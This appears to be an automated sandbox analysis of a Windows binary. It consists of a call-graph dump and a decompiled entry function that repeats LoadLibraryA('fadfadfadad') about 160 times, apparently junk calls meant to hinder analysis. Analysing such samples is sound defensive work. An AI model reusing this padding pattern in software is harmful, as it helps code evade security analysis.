18971->18970 18972->18965 18973 e15770 lstrcpyn LoadLibraryExA 18972->18973 18973->18965 18975 e1542c 18974->18975 18976 e153ec GetProcAddress 18974->18976 18978 e1554e RegQueryValueExA 18975->18978 18987 e1545f 18975->18987 18991 e153b0 18975->18991 18976->18975 18977 e153fd 18976->18977 18977->18975 18983 e15413 lstrcpyn 18977->18983 18978->18963 18978->18964 18979 e15472 lstrcpyn 18986 e15490 18979->18986 18981 e1553a lstrcpyn 18981->18978 18983->18978 18984 e153b0 CharNextA 18984->18986 18985 e153b0 CharNextA 18985->18987 18986->18978 18986->18981 18986->18984 18988 e154af lstrcpyn FindFirstFileA 18986->18988 18987->18978 18987->18979 18988->18978 18989 e154da FindClose lstrlen 18988->18989 18989->18978 18990 e154f9 lstrcpyn lstrlen 18989->18990 18990->18986 18993 e153b8 18991->18993 18992 e153c3 18992->18978 18992->18985 18993->18992 18994 e153b2 CharNextA 18993->18994 18994->18993 18996 e29875 18995->18996 18997 e2987c LoadResource 18995->18997 19005 e297e0 18996->19005 18998 e29896 SizeofResource LockResource 18997->18998 18999 e2988f 18997->18999 19002 e298b4 18998->19002 19001 e297e0 56 API calls 18999->19001 19004 e29895 19001->19004 19002->18922 19004->18998 19006 e15e1c 56 API calls 19005->19006 19007 e29819 19006->19007 19008 e1b940 56 API calls 19007->19008 19009 e29828 19008->19009 19010 e14068 11 API calls 19009->19010 19011 e29842 19010->19011 19011->18997 19012 10817a7 19013 108182c InterlockedDecrement 19012->19013 19014 10817bd 19012->19014 19015 108183b 19013->19015 19021 1081817 19013->19021 19016 10817c4 InterlockedIncrement 19014->19016 19014->19021 19017 108186d HeapDestroy 19015->19017 19019 1081848 SleepEx 19015->19019 19022 1081861 CloseHandle 19015->19022 19018 10817d7 HeapCreate 19016->19018 19016->19021 19017->19021 19020 10817ed 19018->19020 19018->19021 19019->19015 19019->19022 19023 1081e53 6 API calls 19020->19023 19022->19017 19023->19021 22193 e12608 22194 e1261c 22193->22194 22195 e12621 22193->22195 22196 e11a0c 4 API calls 
22194->22196 22197 e12650 22195->22197 22198 e12646 RtlEnterCriticalSection 22195->22198 22200 e12625 22195->22200 22196->22195 22207 e1242c 22197->22207 22198->22197 22202 e1265d 22202->22200 22204 e126ae RtlLeaveCriticalSection 22202->22204 22203 e120f8 14 API calls 22205 e12669 22203->22205 22204->22200 22205->22202 22217 e12288 22205->22217 22208 e12440 22207->22208 22209 e1245d 22208->22209 22210 e124ef 22208->22210 22211 e1246c 22208->22211 22209->22202 22209->22203 22210->22209 22215 e1258c 22210->22215 22234 e11ea0 22210->22234 22238 e11fa4 22210->22238 22211->22209 22231 e11c74 22211->22231 22215->22209 22216 e11e18 9 API calls 22215->22216 22216->22209 22218 e122a1 22217->22218 22219 e122a6 22217->22219 22220 e11a0c 4 API calls 22218->22220 22221 e122d7 RtlEnterCriticalSection 22219->22221 22226 e122aa 22219->22226 22227 e122e1 22219->22227 22220->22219 22221->22227 22222 e122ed 22224 e12419 22222->22224 22225 e1240f RtlLeaveCriticalSection 22222->22225 22223 e12370 22223->22226 22228 e11ea0 7 API calls 22223->22228 22224->22202 22225->22224 22226->22202 22227->22222 22227->22223 22229 e1239c 22227->22229 22228->22226 22229->22222 22230 e11e18 7 API calls 22229->22230 22230->22222 22232 e12288 9 API calls 22231->22232 22233 e11c95 22232->22233 22233->22209 22235 e11eb2 22234->22235 22236 e11ea9 22234->22236 22235->22210 22236->22235 22237 e11c74 9 API calls 22236->22237 22237->22235 22243 e1185c 22238->22243 22240 e11fb9 22241 e11eec 9 API calls 22240->22241 22242 e11fc6 22240->22242 22241->22242 22242->22210 22246 e1187b 22243->22246 22244 e1192f 22251 e118db 22244->22251 22258 e116b8 22244->22258 22245 e11588 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 22245->22246 22246->22244 22246->22245 22248 e11420 LocalAlloc 22246->22248 22249 e11915 22246->22249 22250 e118ca 22246->22250 22248->22246 22252 e11600 VirtualFree 22249->22252 22254 e11600 22250->22254 22251->22240 22252->22251 22257 e1162f 22254->22257 22255 e11688 22255->22251 22256 e1165c 
VirtualFree 22256->22257 22257->22255 22257->22256 22260 e116fe 22258->22260 22259 e1172e 22259->22251 22260->22259 22261 e1171a VirtualAlloc 22260->22261 22261->22259 22261->22260 18315 e41208 18316 e41212 18315->18316 18327 e40814 18316->18327 18318 e41228 18331 e30840 18318->18331 18320 e412b6 18342 e55508 18320->18342 18322 e412c7 18346 e41e88 18322->18346 18324 e41328 18350 e464ec 18324->18350 18326 e4134f 18328 e4081a 18327->18328 18354 e58d78 18328->18354 18330 e4082f 18330->18318 18332 e30847 18331->18332 18333 e3085c RtlInitializeCriticalSection 18332->18333 18334 e2fd50 27 API calls 18333->18334 18335 e30871 18334->18335 18682 e3027c 18335->18682 18337 e30892 18338 e30548 27 API calls 18337->18338 18339 e308b3 18338->18339 18686 e27360 18339->18686 18341 e308e3 18341->18320 18343 e55513 18342->18343 18345 e5551a 18342->18345 18695 e554d4 18343->18695 18345->18322 18347 e41e97 18346->18347 18348 e41eae 18346->18348 18347->18324 18348->18347 18825 e42fc0 18348->18825 18352 e464fc 18350->18352 18351 e46521 18351->18326 18352->18351 18854 e490f4 18352->18854 18355 e58d89 18354->18355 18373 e55a2c 18355->18373 18357 e58dad 18379 e2dce8 18357->18379 18359 e58db8 18382 e30548 18359->18382 18361 e58dca 18386 e306f0 18361->18386 18364 e58e0c 18394 e4686c 18364->18394 18365 e58dff 18390 e14068 18365->18390 18369 e58e0a 18371 e14068 11 API calls 18369->18371 18372 e58e6f 18371->18372 18372->18330 18374 e55a36 18373->18374 18405 e2cc58 18374->18405 18376 e55a4c 18409 e2fd50 18376->18409 18378 e55a6b 18378->18357 18380 e2dcf8 VirtualAlloc 18379->18380 18381 e2dd26 18379->18381 18380->18381 18381->18359 18383 e3054e 18382->18383 18384 e2f294 27 API calls 18383->18384 18385 e30569 18384->18385 18385->18361 18387 e30702 18386->18387 18579 e30674 18387->18579 18391 e14089 18390->18391 18392 e1406e 18390->18392 18391->18369 18392->18391 18612 e126ec 18392->18612 18616 e4666c 18394->18616 18396 e46879 18397 e140bc 25 API calls 18396->18397 18398 e46883 18397->18398 18399 
e140bc 18398->18399 18401 e140c0 18399->18401 18403 e140d0 18399->18403 18400 e140fe 18400->18369 18401->18403 18677 e1412c 18401->18677 18403->18400 18404 e126ec 11 API calls 18403->18404 18404->18400 18406 e2cc5f 18405->18406 18408 e2cc82 18406->18408 18413 e2ce10 18406->18413 18408->18376 18410 e2fd56 18409->18410 18467 e2f294 18410->18467 18412 e2fd78 18412->18378 18414 e2ce24 18413->18414 18415 e2ce56 18414->18415 18417 e2d2e0 18414->18417 18415->18408 18419 e2d2f0 18417->18419 18418 e2d329 18418->18415 18419->18418 18421 e2d2e0 56 API calls 18419->18421 18422 e2d250 18419->18422 18421->18419 18423 e2d26e 18422->18423 18424 e2d25c 18422->18424 18435 e2707c 18423->18435 18428 e27008 18424->18428 18439 e15e1c 18428->18439 18430 e2702b 18445 e26fd0 18430->18445 18436 e27086 18435->18436 18437 e2709a 18436->18437 18438 e27008 56 API calls 18436->18438 18437->18419 18438->18437 18440 e15e2c 18439->18440 18444 e15e5d 18439->18444 18440->18444 18449 e15388 18440->18449 18442 e15e4c LoadStringA 18454 e14158 18442->18454 18444->18430 18446 e26fde 18445->18446 18459 e1b940 18446->18459 18448 e26ffd 18448->18448 18450 e153af 18449->18450 18452 e15392 18449->18452 18450->18442 18451 e15340 30 API calls 18453 e153a8 18451->18453 18452->18450 18452->18451 18453->18442 18455 e1412c 25 API calls 18454->18455 18456 e14168 18455->18456 18457 e14068 11 API calls 18456->18457 18458 e14180 18457->18458 18458->18444 18460 e1b94c 18459->18460 18461 e19050 56 API calls 18460->18461 18462 e1b979 18461->18462 18463 e140bc 25 API calls 18462->18463 18464 e1b984 18463->18464 18465 e14068 11 API calls 18464->18465 18466 e1b999 18465->18466 18466->18448 18468 e2f2af 18467->18468 18475 e2f27c RtlEnterCriticalSection 18468->18475 18470 e2f2b9 18473 e2f316 18470->18473 18477 e126cc 18470->18477 18476 e2f288 RtlLeaveCriticalSection 18473->18476 18474 e2f367 18474->18412 18475->18470 18476->18474 18478 e126d1 18477->18478 18479 e126e4 18477->18479 18483 e120f8 18478->18483 18479->18473 18480 
e126d7 18480->18479 18494 e12828 18480->18494 18484 e12111 18483->18484 18485 e1210c 18483->18485 18487 e1213e RtlEnterCriticalSection 18484->18487 18488 e12148 18484->18488 18493 e1211d 18484->18493 18500 e11a0c RtlInitializeCriticalSection 18485->18500 18487->18488 18488->18493 18507 e12004 18488->18507 18491 e12273 18491->18480 18492 e12269 RtlLeaveCriticalSection 18492->18491 18493->18480 18495 e127dc 18494->18495 18498 e12801 18495->18498 18551 e16110 18495->18551 18559 e127d0 18498->18559 18501 e11a30 RtlEnterCriticalSection 18500->18501 18502 e11a3a 18500->18502 18501->18502 18503 e11a58 LocalAlloc 18502->18503 18504 e11a72 18503->18504 18505 e11ac1 18504->18505 18506 e11ab7 RtlLeaveCriticalSection 18504->18506 18505->18484 18506->18505 18508 e12014 18507->18508 18509 e12040 18508->18509 18512 e12064 18508->18512 18513 e11f78 18508->18513 18509->18512 18518 e11e18 18509->18518 18512->18491 18512->18492 18522 e117cc 18513->18522 18515 e11f88 18517 e11f95 18515->18517 18531 e11eec 18515->18531 18517->18508 18519 e11e36 18518->18519 18520 e11e6d 18518->18520 18519->18512 18520->18519 18538 e11d68 18520->18538 18523 e117e8 18522->18523 18524 e11524 LocalAlloc VirtualAlloc VirtualFree 18523->18524 18525 e117f2 18523->18525 18527 e11420 LocalAlloc 18523->18527 18528 e11843 18523->18528 18529 e117fe 18523->18529 18524->18523 18526 e116b8 VirtualAlloc 18525->18526 18526->18529 18527->18523 18530 e11600 VirtualFree 18528->18530 18529->18515 18530->18529 18532 e11ea0 9 API calls 18531->18532 18533 e11f00 18532->18533 18534 e11420 LocalAlloc 18533->18534 18535 e11f10 18534->18535 18536 e11f18 18535->18536 18537 e11c44 9 API calls 18535->18537 18536->18517 18537->18536 18539 e11d7e 18538->18539 18540 e11da9 18539->18540 18541 e11dbd 18539->18541 18550 e11e06 18539->18550 18542 e11980 LocalAlloc VirtualFree VirtualFree 18540->18542 18543 e11980 LocalAlloc VirtualFree VirtualFree 18541->18543 18544 e11dbb 18542->18544 18543->18544 18545 e11c44 9 API calls 18544->18545 
18544->18550 18546 e11de1 18545->18546 18547 e11dfb 18546->18547 18548 e11c98 9 API calls 18546->18548 18549 e11490 LocalAlloc 18547->18549 18548->18547 18549->18550 18550->18519 18552 e16145 TlsGetValue 18551->18552 18553 e1611f 18551->18553 18554 e1612a 18552->18554 18555 e1614f 18552->18555 18553->18498 18562 e16054 18554->18562 18555->18498 18557 e1612f TlsGetValue 18558 e1613e 18557->18558 18558->18498 18569 e14050 18559->18569 18563 e1605a 18562->18563 18564 e1607e 18563->18564 18568 e16040 LocalAlloc 18563->18568 18564->18557 18566 e1607a 18566->18564 18567 e1608a TlsSetValue 18566->18567 18567->18564 18568->18566 18572 e13f78 18569->18572 18573 e13f91 18572->18573 18574 e13eec GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 18573->18574 18575 e13fba 18573->18575 18574->18575 18576 e13ffc FreeLibrary 18575->18576 18577 e14020 ExitProcess 18575->18577 18576->18575 18586 e2faa8 18579->18586 18587 e2fab5 18586->18587 18588 e2faaf RtlEnterCriticalSection 18586->18588 18589 e2f428 18587->18589 18588->18587 18601 e2f27c RtlEnterCriticalSection 18589->18601 18591 e2f441 18592 e2f294 27 API calls 18591->18592 18593 e2f45d 18592->18593 18602 e2f378 18593->18602 18595 e2f47b 18609 e2f288 RtlLeaveCriticalSection 18595->18609 18597 e2f490 18598 e2fab8 18597->18598 18599 e2fac5 18598->18599 18600 e2fabf RtlLeaveCriticalSection 18598->18600 18599->18364 18599->18365 18600->18599 18601->18591 18603 e2f424 18602->18603 18604 e2f38e 18602->18604 18603->18595 18610 e2f27c RtlEnterCriticalSection 18604->18610 18607 e2f3fe 18607->18595 18608 e2f39c 18611 e2f288 RtlLeaveCriticalSection 18608->18611 18609->18597 18610->18608 18611->18607 18613 e126f1 18612->18613 18615 e12704 18612->18615 18614 e12828 11 API calls 18613->18614 18613->18615 18614->18615 18615->18391 18617 e4669c 18616->18617 18618 e467e7 18616->18618 18621 e14068 11 API calls 18617->18621 18619 e14068 11 API calls 18618->18619 18620 e46816 18619->18620 18620->18396 18622 e466b9 GetKeyboardLayoutList 
18621->18622 18622->18618 18623 e466d0 18622->18623 18623->18618 18629 e18fd0 18623->18629 18626 e46737 RegQueryValueExA 18627 e467bc RegCloseKey 18626->18627 18628 e4676d 18626->18628 18627->18396 18628->18627 18630 e18fff RegOpenKeyExA 18629->18630 18631 e18fe0 18629->18631 18630->18623 18630->18626 18631->18630 18633 e18c58 18631->18633 18639 e18c81 18633->18639 18634 e18c92 18652 e18faf 18634->18652 18637 e18d3a 11 API calls 18637->18639 18639->18634 18639->18637 18641 e18d82 18639->18641 18649 e18c4c 18639->18649 18642 e18d93 18641->18642 18646 e18ded 18641->18646 18644 e18e8b 18642->18644 18642->18646 18643 e18faf 11 API calls 18643->18646 18648 e18224 18644->18648 18659 e18c28 18644->18659 18646->18643 18646->18648 18655 e18bd0 18646->18655 18648->18639 18650 e14068 11 API calls 18649->18650 18651 e18c56 18650->18651 18651->18639 18653 e14068 11 API calls 18652->18653 18654 e18fbc 18653->18654 18654->18630 18656 e18be1 18655->18656 18664 e17e10 18656->18664 18658 e18c21 18658->18646 18660 e18c40 18659->18660 18662 e18c34 18659->18662 18661 e12828 11 API calls 18660->18661 18663 e18c47 18661->18663 18662->18648 18663->18648 18667 e1b9fc 18664->18667 18666 e17e29 18666->18658 18668 e1ba0a 18667->18668 18669 e15e1c 56 API calls 18668->18669 18670 e1ba34 18669->18670 18671 e19050 56 API calls 18670->18671 18672 e1ba42 18671->18672 18673 e140bc 25 API calls 18672->18673 18674 e1ba4d 18673->18674 18675 e1408c 11 API calls 18674->18675 18676 e1ba67 18675->18676 18676->18666 18678 e14130 18677->18678 18679 e14154 18677->18679 18680 e126cc 25 API calls 18678->18680 18679->18403 18681 e1413d 18680->18681 18681->18403 18683 e30282 18682->18683 18684 e2f294 27 API calls 18683->18684 18685 e3029d 18684->18685 18685->18337 18693 e273e8 RtlEnterCriticalSection 18686->18693 18688 e27372 18689 e27399 18688->18689 18691 e27008 56 API calls 18688->18691 18694 e2744c RtlLeaveCriticalSection 18689->18694 18691->18689 18692 e273db 18692->18341 18693->18688 18694->18692 18696 
e55504 18695->18696 18697 e554dd 18695->18697 18696->18345 18702 e30dfc 18697->18702 18703 e30e4b 18702->18703 18704 e30e0c 18702->18704 18710 e273fc 18703->18710 18705 e30e20 18704->18705 18717 e30d9c 18704->18717 18705->18703 18724 e30ce8 18705->18724 18813 e273e8 RtlEnterCriticalSection 18710->18813 18712 e2740e 18814 e271c0 18712->18814 18716 e2743e ReleaseDC 18716->18696 18718 e30da7 18717->18718 18719 e30def 18717->18719 18718->18719 18720 e30db8 SelectObject SelectObject SelectObject 18718->18720 18721 e30cc4 18719->18721 18720->18719 18727 e30e50 18721->18727 18810 e30b30 18724->18810 18726 e30d00 18726->18703 18728 e30e69 18727->18728 18734 e30cd7 GetCurrentPositionEx 18727->18734 18729 e30e8d 18728->18729 18737 e1b9c0 18728->18737 18731 e30e9e 18729->18731 18741 e30eec 18729->18741 18732 e30eaa 18731->18732 18746 e30f18 18731->18746 18732->18734 18749 e30f48 18732->18749 18734->18705 18738 e1b9c7 18737->18738 18739 e15e1c 56 API calls 18738->18739 18740 e1b9df 18739->18740 18740->18729 18761 e2ff38 18741->18761 18743 e30ef7 SelectObject 18774 e2fa64 18743->18774 18786 e30438 18746->18786 18748 e30f23 SelectObject SetROP2 18748->18732 18798 e30724 18749->18798 18751 e30f53 UnrealizeObject 18752 e30724 4 API calls 18751->18752 18753 e30f61 SelectObject 18752->18753 18754 e30f73 18753->18754 18755 e30f77 18754->18755 18756 e30f9b 18754->18756 18757 e2fa64 GetSysColor 18755->18757 18758 e2fa64 GetSysColor 18756->18758 18759 e30f84 SetBkColor SetBkMode 18757->18759 18760 e30fa8 SetBkColor SetBkMode 18758->18760 18759->18734 18760->18734 18762 e300a0 18761->18762 18763 e2ff6d 18761->18763 18782 e1408c 18762->18782 18777 e2f27c RtlEnterCriticalSection 18763->18777 18767 e2ff77 18768 e30081 18767->18768 18778 e18000 18767->18778 18781 e2f288 RtlLeaveCriticalSection 18768->18781 18770 e30098 18770->18743 18772 e30072 CreateFontIndirectA 18772->18768 18773 e3000e 18773->18772 18775 e2fa73 SetTextColor 18774->18775 18776 e2fa68 GetSysColor 18774->18776 18775->18731 
18776->18775 18777->18767 18779 e1800d 18778->18779 18780 e18025 CompareStringA 18779->18780 18780->18773 18781->18770 18784 e14092 18782->18784 18783 e140b8 18783->18743 18784->18783 18785 e126ec 11 API calls 18784->18785 18785->18784 18787 e304c5 18786->18787 18788 e3044d 18786->18788 18787->18748 18796 e2f27c RtlEnterCriticalSection 18788->18796 18790 e30457 18791 e304a6 18790->18791 18792 e2fa64 GetSysColor 18790->18792 18797 e2f288 RtlLeaveCriticalSection 18791->18797 18794 e30494 CreatePenIndirect 18792->18794 18794->18791 18795 e304bd 18795->18748 18796->18790 18797->18795 18799 e307f8 18798->18799 18800 e3073d 18798->18800 18799->18751 18808 e2f27c RtlEnterCriticalSection 18800->18808 18802 e307d9 18809 e2f288 RtlLeaveCriticalSection 18802->18809 18804 e307f0 18804->18751 18805 e2fa64 GetSysColor 18806 e307c7 CreateBrushIndirect 18805->18806 18806->18802 18807 e30747 18807->18802 18807->18805 18808->18807 18809->18804 18811 e30e50 73 API calls 18810->18811 18812 e30b46 MoveToEx 18811->18812 18812->18726 18813->18712 18815 e271cb 18814->18815 18816 e271da 18815->18816 18819 e26f6c 18815->18819 18818 e2744c RtlLeaveCriticalSection 18816->18818 18818->18716 18820 e26f77 18819->18820 18821 e26f8b 18820->18821 18822 e27008 56 API calls 18820->18822 18823 e2707c 56 API calls 18821->18823 18822->18821 18824 e26f94 18823->18824 18824->18816 18826 e42fd7 18825->18826 18827 e4330c 18825->18827 18826->18827 18828 e43005 18826->18828 18829 e42ff0 18826->18829 18827->18347 18831 e43030 18828->18831 18833 e4301b 18828->18833 18839 e429d8 18829->18839 18832 e42ffd 18831->18832 18851 e46438 18831->18851 18834 e429d8 56 API calls 18832->18834 18835 e429d8 56 API calls 18833->18835 18837 e4304d 18834->18837 18835->18832 18837->18827 18838 e46438 56 API calls 18837->18838 18838->18837 18840 e429f2 18839->18840 18841 e46438 56 API calls 18840->18841 18842 e42a1f 18840->18842 18845 e42a35 18840->18845 18841->18840 18843 e46438 56 API calls 18842->18843 18850 e42a29 18843->18850 

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          C-Code - Quality: 100%
                          			_entry_() {
                          
                          				E00E1615C(0xe7b028);
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				if (LoadIconA(0, 0x113c) != 0) goto 0xe7bdf0;
                          			}




                          APIs
                          • LoadLibraryA.KERNEL32(fadfadfadad), ref: 00E7B45E
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad), ref: 00E7B468
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B472
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B47C
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B486
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B490
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B49A
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B4A4
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B4AE
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B4B8
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B4C2
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B4CC
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B4D6
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B4E0
